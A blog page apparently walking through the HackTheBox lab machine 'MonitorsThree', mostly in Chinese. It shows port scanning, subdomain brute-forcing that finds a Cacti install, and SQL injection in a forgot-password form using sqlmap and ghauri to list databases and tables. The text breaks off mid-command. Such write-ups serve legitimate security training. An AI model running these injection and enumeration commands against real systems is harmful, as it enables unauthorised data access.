<!DOCTYPE html>
<html lang=en>
<head>
  <!-- bing -->
  <meta name="msvalidate.01" content="D6E6F0AB3EAD6BA4F5541EDCB8EEDCC5" />

  <!-- toc.js -->
  <script src='/js/toc.js'> </script>
  <script>
  window.addEventListener('hexo-blog-decrypt', function(event) {
    setTimeout(() => {
      makeList({
       'target': '#toc',   // Selector for element to place table of contents
       'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
      });

      makeList({
       'target': '#toc-mobile',   // Selector for element to place table of contents
       'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
      });
    }, 1000);
  });  
  </script>
  
  <!-- mane defined -->
  <script>
    function scriptOnError(errorMsg){
      try{ document.body.innerHTML = ""; }catch{}
      document.write("<h1>Error: Loading script error. </h1>");
      document.write("<p>Some script loading error, Please Disable AD Block and retry again.</p>");
      document.write("<p>很抱歉，有些脚本似乎無法正常加載，請嘗試關閉 AD Block 再試一次。</p>");
      document.write("<p>Error on loading: ");
      document.write(errorMsg);
      document.write("</p>");

      window.stop ? window.stop() : document.execCommand("Stop");
    }
  </script>

  <!-- GTM -->
  <script>
    if ((window.location.hostname != "localhost" ) && (window.location.hostname != "manesec.github.io") ){
        (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
          new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
          j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
          'https://www.googletagmanager.com/gtm.js?id='+i+dl;
          f.parentNode.insertBefore(j,f);
          })(window,document,'script','dataLayer','GTM-T952MB6B');
    }
  </script>

  <!-- clarity -->
  <script type="text/javascript">
      (function(c,l,a,r,i,t,y){
          c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
          t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
          y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
      })(window, document, "clarity", "script", "ph6eztilds");
  </script>

  <!-- check baseurl -->
  <script>
    setInterval( ()=>{
      if ((window.location.hostname != "localhost" ) && (window.location.hostname != "manesec.github.io") ){
          window.location.href = "https://manesec.github.io" + window.location.pathname;
      }
    }, 500);
  </script>

   <!-- fancybox support -->
   
     
<link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css">

   

    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Recommand: Let’s Sign Up HTB Academy to get Higher level of knowledge :P 非常推薦: 想要變强嗎？ 快來加入 HTB Academy 獲得更高級的知識吧 :P MonitorsThree​​ https:&#x2F;&#x2F;www.hackthebox.com&#x2F;achievement&#x2F;machine&#x2F;463126&#x2F;622 0x1 - Nmap">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Machine - MonitorsThree">
<meta property="og:url" content="https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/index.html">
<meta property="og:site_name" content="Mane">
<meta property="og:description" content="Recommand: Let’s Sign Up HTB Academy to get Higher level of knowledge :P 非常推薦: 想要變强嗎？ 快來加入 HTB Academy 獲得更高級的知識吧 :P MonitorsThree​​ https:&#x2F;&#x2F;www.hackthebox.com&#x2F;achievement&#x2F;machine&#x2F;463126&#x2F;622 0x1 - Nmap">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173659-j3bp174.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825155627-1ansjs0.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825155704-kxap0af.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825155830-4qmzyuh.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825160026-6qojz0b.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825160236-qchr3jz.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240830043616-xj39d9b.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240830044022-mrk63qb.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825160614-q4sjav5.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825161112-v2xmp82.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162024-npo2ix6.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162235-mnnsiua.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162452-adkfdhy.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162433-1aqq7ih.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162626-a4ob2tq.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163211-ughhrb5.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825053613-lbq44vg.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163333-7edybec.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163841-v8br6xw.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163904-7tnva43.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825164029-bn3cms3.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825164351-z9svp4a.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825172520-xjhstdu.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825172938-0rtdp30.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173022-2jjoopn.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173042-l9c2vur.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173114-2qx1fd2.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173313-s9o6oz1.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173339-3calzwq.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173305-e8x0w5z.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825053318-w154srk.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825053427-gs9akrr.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123325-s7wk4au.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123300-561apie.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123503-rycsfwz.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828123524-o3ysgws.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124023-fcobtq4.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124117-uql8knf.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142335-itpz00s.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124956-w6f81hx.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124347-ctp7cve.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828125147-yvsc3fe.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124533-qisfg95.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142536-qlno4f2.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142557-hd8q8x4.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828124623-dtcu9o7.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828142616-d69gnfm.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240828125752-minbdst.png">
<meta property="og:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240830081352-1m8uh4r.png">
<meta property="article:published_time" content="2024-08-30T10:11:00.000Z">
<meta property="article:modified_time" content="2025-01-19T03:16:20.922Z">
<meta property="article:author" content="manesec">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173659-j3bp174.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>HackTheBox - Machine - MonitorsThree</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T952MB6B"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-8C677QTBX9"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-8C677QTBX9');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/09/03/2024-htb-machine/35-Infiltrator/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/08/23/2024-htb-machine/33-Lantern/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&text=HackTheBox - Machine - MonitorsThree"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&is_video=false&description=HackTheBox - Machine - MonitorsThree"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=HackTheBox - Machine - MonitorsThree&body=Check out this article: https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&title=HackTheBox - Machine - MonitorsThree"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&name=HackTheBox - Machine - MonitorsThree&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://manesec.github.io/2024/08/30/2024-htb-machine/34-MonitorsThree/&t=HackTheBox - Machine - MonitorsThree"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc"></div>
    <style>
    	#toc {
	}
    	#toc ul {
	   display: grid ! important;
	}
    	#toc li {
	   margin: 0 0 0 0 ! important;  
	}
	#toc .level-1 {
	   font-size: 0.8rem;
	   color: #ffffff ;
	   background: #2bbc8ae5;
	   padding-left: 3px;
           padding-right: 3px;
	}


	#toc .level-1:hover {
	   background: #00b4ddc7;
	   color: #ffffff !important;
	}

	#toc .level-2 {
	   font-size: 0.8rem;
	   color: #2bbc8a;
	}
	#toc .level-3 {
	   font-size: 0.7rem;
	   color: #40474b;
	}
	#toc .level-4 , #toc .level-5, #toc .level-6 {
	   font-size: 0.6rem;
	   color: #8c8c8c;
	}
    </style>
    
    
      <script>
      	setTimeout(() => {
	  makeList({
	     'target': '#toc',   // Selector for element to place table of contents
	     'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
	  });
	}, 1000);
      </script>
     
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        HackTheBox - Machine - MonitorsThree
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">manesec</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-08-30T10:11:00.000Z" class="dt-published" itemprop="datePublished">2024-08-30</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p><strong>Recommand</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">Let’s Sign Up HTB Academy to get Higher level of knowledge :P</a></p>
<p><strong>非常推薦</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">想要變强嗎？ 快來加入 HTB Academy 獲得更高級的知識吧 :P</a></p>
<h1 id="MonitorsThree"><a href="#MonitorsThree" class="headerlink" title="MonitorsThree"></a>MonitorsThree</h1><p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173659-j3bp174.png" alt="image">​</p>
<p><a target="_blank" rel="noopener" href="https://www.hackthebox.com/achievement/machine/463126/622">https://www.hackthebox.com/achievement/machine/463126/622</a></p>
<h2 id="0x1-Nmap"><a href="#0x1-Nmap" class="headerlink" title="0x1 - Nmap"></a>0x1 - Nmap</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">22/tcp   open     ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   256 86:f8:7d:6f:42:91:bb:89:72:91:af:72:f3:01:ff:5b (ECDSA)</span><br><span class="line">| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNwl884vMmev5jgPEogyyLoyjEHsq+F9DzOCgtCA4P8TH2TQcymOgliq7Yzf7x1tL+i2mJedm2BGMKOv1NXXfN0=</span><br><span class="line">|   256 50:f9:ed:8e:73:64:9e:aa:f6:08:95:14:f0:a6:0d:57 (ED25519)</span><br><span class="line">|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIN5W5QMRdl0vUKFiq9AiP+TVxKIgpRQNyo25qNs248Pa</span><br><span class="line">80/tcp   open     http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)</span><br><span class="line">| http-methods: </span><br><span class="line">|_  Supported Methods: GET HEAD POST OPTIONS</span><br><span class="line">|_http-title: Did not follow redirect to http://monitorsthree.htb/</span><br><span class="line">|_http-server-header: nginx/1.18.0 (Ubuntu)</span><br><span class="line">8084/tcp filtered websnp  no-response</span><br></pre></td></tr></table></figure>

<p>只有80端口是開著的，有一個隱藏端口，目前不知道是什麼，所以從80端口入手：</p>
<h2 id="0x2-80-web"><a href="#0x2-80-web" class="headerlink" title="0x2 80 - web"></a>0x2 80 - web</h2><p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825155627-1ansjs0.png" alt="image">​</p>
<p>一打開就看到一個主域名所以隨便掃一下子目錄：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$ ffuf -w /Tools/Wordlists/N0kovoSubdomains/n0kovo_subdomains_small.txt -H <span class="string">&quot;Host: FUZZ.monitorsthree.htb&quot;</span> -u http://10.129.15.38 -fs 13560</span><br><span class="line"></span><br><span class="line">        /<span class="string">&#x27;___\  /&#x27;</span>___\           /<span class="string">&#x27;___\   </span></span><br><span class="line"><span class="string">       /\ \__/ /\ \__/  __  __  /\ \__/   </span></span><br><span class="line"><span class="string">       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\  </span></span><br><span class="line"><span class="string">        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/  </span></span><br><span class="line"><span class="string">         \ \_\   \ \_\  \ \____/  \ \_\   </span></span><br><span class="line"><span class="string">          \/_/    \/_/   \/___/    \/_/   </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">       v2.1.0-dev</span></span><br><span class="line"><span class="string">________________________________________________</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> :: Method           : GET</span></span><br><span class="line"><span class="string"> :: URL              : http://10.129.15.38</span></span><br><span class="line"><span class="string"> :: Wordlist         : FUZZ: /Tools/Wordlists/N0kovoSubdomains/n0kovo_subdomains_small.txt</span></span><br><span class="line"><span class="string"> :: Header           : Host: FUZZ.monitorsthree.htb</span></span><br><span class="line"><span class="string"> :: Follow redirects : false</span></span><br><span class="line"><span class="string"> :: Calibration      : false</span></span><br><span class="line"><span class="string"> :: Timeout          : 10</span></span><br><span class="line"><span class="string"> :: Threads          : 40</span></span><br><span class="line"><span class="string"> :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500</span></span><br><span class="line"><span class="string"> :: Filter           : Response size: 13560</span></span><br><span class="line"><span class="string">________________________________________________</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 56ms]</span></span><br><span class="line"><span class="string">:: Progress: [200000/200000] :: Job [1/1] :: 711 req/sec :: Duration: [0:05:01] :: Errors: 0 ::</span></span><br><span class="line"><span class="string">                                                                                        </span></span><br></pre></td></tr></table></figure>

<p>然後打開這個子域名發現是個cacti，它是1.2.26版本</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825155704-kxap0af.png" alt="image">​</p>
<p>隨手網上查了一下，登陸前沒有什麼漏洞，所以先跳過吧。</p>
<h2 id="0x3-Found-SQL-injection-try-to-get-admin-hash"><a href="#0x3-Found-SQL-injection-try-to-get-admin-hash" class="headerlink" title="0x3 Found SQL injection, try to get admin hash"></a>0x3 Found SQL injection, try to get admin hash</h2><p>來到忘記密碼，隨手試一下：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825155830-4qmzyuh.png" alt="image">​</p>
<p>發現有報錯，所以可以使用error based injection</p>
<h3 id="If-we-using-SQLMAP"><a href="#If-we-using-SQLMAP" class="headerlink" title="If we using SQLMAP ?"></a>If we using SQLMAP ?</h3><p>如果使用sqlmap的話，保存到文件：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825160026-6qojz0b.png" alt="image">​</p>
<p>然後使用SQLMAP讀取這個文件:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ sqlmap -r forgot.req  -p username --batch</span><br></pre></td></tr></table></figure>

<p>如下圖：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825160236-qchr3jz.png" alt="image">​</p>
<p>什麼？ <code>time-based blind</code>​ ，這要等到多久。。</p>
<p>因為sqlmap識別到是 time-based，如果網絡抖動的情況下會出現數據錯誤，而且數據並不是那麼可靠，既然上面出現了錯誤信息也就沒有必要使用sqlmap了。</p>
<p>所以放棄 sqlmap。</p>
<h3 id="Giveup-SQLMAP-but-we-have-ghauri"><a href="#Giveup-SQLMAP-but-we-have-ghauri" class="headerlink" title="Giveup SQLMAP but we have ghauri"></a>Giveup SQLMAP but we have ghauri</h3><p>放棄了sqlmap，後來想到了其實也有平替的自動化工具 <code>ghauri</code>​，</p>
<p>他與sqlmap的區別可以參考這裏： <a target="_blank" rel="noopener" href="https://infosecwriteups.com/how-i-got-owned-a-multi-billion-dollar-retailers-mysql-databases-using-simple-sql-injection-30f8b0dfd9ce">How I Gained Access to a Multi-Billion Dollar Retailer’s MySQL Databases Using Simple SQL Injection</a></p>
<p>在日常使用中，如果sqlmap跑不出來就換一個工具試試看，沒必要糾結太多。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ghauri -r forgot.req -p username</span><br></pre></td></tr></table></figure>

<p>他成功的識別到了是 error-based injection，所以這樣扒出來的速度就會比較快。</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240830043616-xj39d9b.png" alt="image-20240830043616-xj39d9b">​</p>
<p>命令如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">$ ghauri -r forgot.req -p username --batch --dbs</span><br><span class="line">available databases [2]:</span><br><span class="line">[*] monitorsthree_db</span><br><span class="line">[*] information_schema</span><br><span class="line"></span><br><span class="line">$ ghauri -r forgot.req -p username --batch -D monitorsthree_db --tables</span><br><span class="line">Database: monitorsthree_db</span><br><span class="line">[6 tables]</span><br><span class="line">+---------------+</span><br><span class="line">| invoices      |</span><br><span class="line">| changelog     |</span><br><span class="line">| invoice_tasks |</span><br><span class="line">| <span class="built_in">users</span>         |</span><br><span class="line">| customers     |</span><br><span class="line">| tasks         |</span><br><span class="line">+---------------+</span><br><span class="line"></span><br><span class="line">$ ghauri -r forgot.req -p username --batch -D 